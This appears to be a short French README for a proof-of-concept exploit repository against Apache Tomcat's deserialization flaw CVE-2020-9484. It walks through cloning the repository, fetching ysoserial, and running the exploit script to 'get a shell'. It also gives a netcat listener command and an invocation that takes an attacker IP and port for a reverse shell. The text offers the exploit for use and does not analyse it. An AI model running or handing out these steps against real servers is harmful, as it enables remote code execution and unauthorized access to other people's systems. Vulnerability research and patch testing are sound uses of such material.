
POC pour CVE-2020-9484
POC pour CVE-2020-9484
Apache Tomcat RCE par désérialisation (CVE-2020-9484)
Explorer la documentation »
1. Clonez ce dépôt, vous pourrez alors utiliser CVE-2020-9484 et modifier le code source si nécessaire.
2. Téléchargez ysoserial jar
3. Placez à la fois CVE-2020-9484 et ysoserial.jar dans le même répertoire
4. Obtenez un shell !
Un simple script bash a été écrit pour simplifier l'utilisation de CVE-2020-9484.
Lors de l'exploitation, vous aurez besoin d'un listener netcat prêt
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
